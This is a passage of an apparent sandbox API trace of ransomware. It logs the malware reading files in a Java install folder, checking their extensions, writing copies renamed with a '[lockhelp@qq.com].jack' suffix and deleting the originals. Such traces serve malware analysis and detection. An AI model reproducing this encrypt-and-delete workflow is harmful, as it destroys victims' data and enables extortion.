dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.334] SetEndOfFile (hFile=0x420) returned 1 [0201.335] CloseHandle (hObject=0x420) returned 1 [0201.335] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.335] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif")) returned 1 [0201.336] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.336] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.336] lstrlenW (lpString=".doc") returned 4 [0201.336] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.336] lstrlenW (lpString=".docx") returned 5 [0201.336] lstrcmpiW (lpString1=".docx", lpString2="x.gif") returned -1 [0201.336] lstrlenW (lpString=".pdf") returned 4 [0201.336] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.336] lstrlenW (lpString=".xls") returned 4 [0201.336] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.336] lstrlenW (lpString=".xlsx") returned 5 [0201.336] lstrcmpiW (lpString1=".xlsx", lpString2="x.gif") returned -1 [0201.336] lstrlenW (lpString=".ppt") returned 4 [0201.336] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.336] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.336] lstrlenW (lpString=".zip") returned 4 [0201.336] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.336] lstrlenW (lpString=".rar") returned 4 [0201.336] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.336] lstrlenW (lpString=".bz2") returned 4 [0201.336] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.336] lstrlenW (lpString=".7z") returned 3 [0201.336] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.336] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.336] lstrlenW (lpString=".dbf") returned 4 [0201.336] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.336] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.336] lstrlenW (lpString=".1cd") returned 4 [0201.337] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.337] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.337] lstrlenW (lpString=".jpg") returned 4 [0201.337] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.337] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.337] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.337] lstrlenW (lpString=".doc") returned 4 [0201.337] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.337] lstrlenW (lpString=".docx") returned 5 [0201.337] lstrcmpiW (lpString1=".docx", lpString2="x.gif") returned -1 [0201.337] lstrlenW (lpString=".pdf") returned 4 [0201.337] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.337] lstrlenW (lpString=".xls") returned 4 [0201.337] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.337] lstrlenW (lpString=".xlsx") returned 5 [0201.337] lstrcmpiW (lpString1=".xlsx", lpString2="x.gif") returned -1 [0201.337] lstrlenW (lpString=".ppt") returned 4 [0201.337] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.337] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.337] lstrlenW (lpString=".zip") returned 4 [0201.337] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.337] lstrlenW (lpString=".rar") returned 4 [0201.337] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.337] lstrlenW (lpString=".bz2") returned 4 [0201.337] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.337] lstrlenW (lpString=".7z") returned 3 [0201.337] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.337] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.337] lstrlenW (lpString=".dbf") returned 4 [0201.338] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.338] lstrlenW (lpString=".1cd") returned 4 [0201.338] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.338] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif") returned 59 [0201.338] lstrlenW (lpString=".jpg") returned 4 [0201.338] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.338] lstrcmpiW (lpString1=".gif", lpString2=".jack") returned -1 [0201.338] lstrlenW (lpString="win32_CopyNoDrop32x32.gif") returned 25 [0201.338] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.382] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=153) returned 1 [0201.383] CloseHandle (hObject=0x420) returned 1 [0201.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif")) returned 0x20 [0201.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.383] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.383] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.383] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.383] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.383] GetLastError () returned 0x0 [0201.383] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x99, lpOverlapped=0x0) returned 1 [0201.384] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xa0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xa0, lpOverlapped=0x0) returned 1 [0201.386] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.386] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x106, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x106, lpOverlapped=0x0) returned 1 [0201.386] SetEndOfFile (hFile=0x404) returned 1 [0201.386] CloseHandle (hObject=0x404) returned 1 [0201.387] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.387] SetEndOfFile (hFile=0x420) returned 1 [0201.388] CloseHandle (hObject=0x420) returned 1 [0201.388] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.388] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\images\\cursors\\win32_copynodrop32x32.gif")) returned 1 [0201.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.389] lstrlenW (lpString=".doc") returned 4 [0201.389] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.389] lstrlenW (lpString=".docx") returned 5 [0201.389] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.389] lstrlenW (lpString=".pdf") returned 4 [0201.389] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.389] lstrlenW (lpString=".xls") returned 4 [0201.389] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.389] lstrlenW (lpString=".xlsx") returned 5 [0201.389] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.389] lstrlenW (lpString=".ppt") returned 4 [0201.389] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.389] lstrlenW (lpString=".zip") returned 4 [0201.389] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.389] lstrlenW (lpString=".rar") returned 4 [0201.389] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.389] lstrlenW (lpString=".bz2") returned 4 [0201.389] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.389] lstrlenW (lpString=".7z") returned 3 [0201.389] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.389] lstrlenW (lpString=".dbf") returned 4 [0201.389] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.389] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.389] lstrlenW (lpString=".1cd") returned 4 [0201.390] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.390] lstrlenW (lpString=".jpg") returned 4 [0201.390] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.390] lstrlenW (lpString=".doc") returned 4 [0201.390] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1 [0201.390] lstrlenW (lpString=".docx") returned 5 [0201.390] lstrcmpiW (lpString1=".docx", lpString2="2.gif") returned -1 [0201.390] lstrlenW (lpString=".pdf") returned 4 [0201.390] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1 [0201.390] lstrlenW (lpString=".xls") returned 4 [0201.390] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1 [0201.390] lstrlenW (lpString=".xlsx") returned 5 [0201.390] lstrcmpiW (lpString1=".xlsx", lpString2="2.gif") returned -1 [0201.390] lstrlenW (lpString=".ppt") returned 4 [0201.390] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1 [0201.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.390] lstrlenW (lpString=".zip") returned 4 [0201.390] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1 [0201.390] lstrlenW (lpString=".rar") returned 4 [0201.390] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1 [0201.390] lstrlenW (lpString=".bz2") returned 4 [0201.390] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1 [0201.390] lstrlenW (lpString=".7z") returned 3 [0201.390] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1 [0201.390] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.390] lstrlenW (lpString=".dbf") returned 4 [0201.390] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.391] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.391] lstrlenW (lpString=".1cd") returned 4 [0201.391] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.391] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif") returned 79 [0201.391] lstrlenW (lpString=".jpg") returned 4 [0201.391] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.391] lstrcmpiW (lpString1=".txt", lpString2=".jack") returned 1 [0201.391] lstrlenW (lpString="jvm.hprof.txt") returned 13 [0201.391] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.391] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=4226) returned 1 [0201.391] CloseHandle (hObject=0x420) returned 1 [0201.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt")) returned 0x20 [0201.391] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.392] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.392] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.392] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.392] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.392] GetLastError () returned 0x0 [0201.392] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x1082, lpOverlapped=0x0) returned 1 [0201.404] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x1090, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x1090, lpOverlapped=0x0) returned 1 [0201.405] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.406] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xee, lpOverlapped=0x0) returned 1 [0201.406] SetEndOfFile (hFile=0x404) returned 1 [0201.406] CloseHandle (hObject=0x404) returned 1 [0201.407] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.407] SetEndOfFile (hFile=0x420) returned 1 [0201.408] CloseHandle (hObject=0x420) returned 1 [0201.408] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.408] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\jvm.hprof.txt")) returned 1 [0201.409] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.409] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.409] lstrlenW (lpString=".doc") returned 4 [0201.409] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.409] lstrlenW (lpString=".docx") returned 5 [0201.409] lstrcmpiW (lpString1=".docx", lpString2="f.txt") returned -1 [0201.409] lstrlenW (lpString=".pdf") returned 4 [0201.409] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.409] lstrlenW (lpString=".xls") returned 4 [0201.409] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.409] lstrlenW (lpString=".xlsx") returned 5 [0201.409] lstrcmpiW (lpString1=".xlsx", lpString2="f.txt") returned -1 [0201.409] lstrlenW (lpString=".ppt") returned 4 [0201.409] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.409] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.409] lstrlenW (lpString=".zip") returned 4 [0201.409] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.409] lstrlenW (lpString=".rar") returned 4 [0201.409] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.409] lstrlenW (lpString=".bz2") returned 4 [0201.409] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.409] lstrlenW (lpString=".7z") returned 3 [0201.409] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.409] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.409] lstrlenW (lpString=".dbf") returned 4 [0201.409] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.409] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.409] lstrlenW (lpString=".1cd") returned 4 [0201.410] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.410] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.410] lstrlenW (lpString=".jpg") returned 4 [0201.410] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.410] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.410] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.410] lstrlenW (lpString=".doc") returned 4 [0201.410] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.410] lstrlenW (lpString=".docx") returned 5 [0201.410] lstrcmpiW (lpString1=".docx", lpString2="f.txt") returned -1 [0201.410] lstrlenW (lpString=".pdf") returned 4 [0201.410] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.410] lstrlenW (lpString=".xls") returned 4 [0201.410] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.410] lstrlenW (lpString=".xlsx") returned 5 [0201.410] lstrcmpiW (lpString1=".xlsx", lpString2="f.txt") returned -1 [0201.410] lstrlenW (lpString=".ppt") returned 4 [0201.410] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.410] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.410] lstrlenW (lpString=".zip") returned 4 [0201.410] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.410] lstrlenW (lpString=".rar") returned 4 [0201.410] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.410] lstrlenW (lpString=".bz2") returned 4 [0201.410] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.410] lstrlenW (lpString=".7z") returned 3 [0201.410] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.410] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.411] lstrlenW (lpString=".dbf") returned 4 [0201.411] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.411] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.411] lstrlenW (lpString=".1cd") returned 4 [0201.411] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.411] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\jvm.hprof.txt") returned 52 [0201.411] lstrlenW (lpString=".jpg") returned 4 [0201.411] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.412] lstrcmpiW (lpString1=".dat", lpString2=".jack") returned -1 [0201.412] lstrlenW (lpString="tzdb.dat") returned 8 [0201.412] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.413] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=105500) returned 1 [0201.413] CloseHandle (hObject=0x420) returned 1 [0201.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat")) returned 0x20 [0201.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.413] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.414] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.414] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.414] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.414] GetLastError () returned 0x0 [0201.414] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x19c1c, lpOverlapped=0x0) returned 1 [0201.449] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x19c20, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x19c20, lpOverlapped=0x0) returned 1 [0201.451] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.451] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe4, lpOverlapped=0x0) returned 1 [0201.451] SetEndOfFile (hFile=0x404) returned 1 [0201.451] CloseHandle (hObject=0x404) returned 1 [0201.454] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.454] SetEndOfFile (hFile=0x420) returned 1 [0201.456] CloseHandle (hObject=0x420) returned 1 [0201.456] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.457] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\tzdb.dat")) returned 1 [0201.457] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.457] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.457] lstrlenW 